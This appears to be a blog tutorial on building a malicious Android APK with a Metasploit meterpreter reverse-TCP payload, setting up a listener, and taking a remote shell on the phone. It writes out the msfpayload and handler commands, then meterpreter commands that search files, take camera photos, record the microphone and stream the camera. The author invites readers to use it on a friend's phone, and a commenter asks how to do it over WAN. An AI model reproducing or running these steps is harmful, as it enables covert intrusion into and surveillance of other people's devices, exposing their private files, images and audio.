How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit

You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > app.apk

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:

Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.

Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit

When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.

Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4

Take photos using the devices cameras

First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap

If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2

Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2

Any Issue or thing you dont understand feel free to comment below ... Thanks 


  1. please help to do this in WAN.plzzzzzzzzzzzzzzzzzzzz

  2. It will be posted here soon thanks for the suggestion its appreciated.


Powered by Blogger.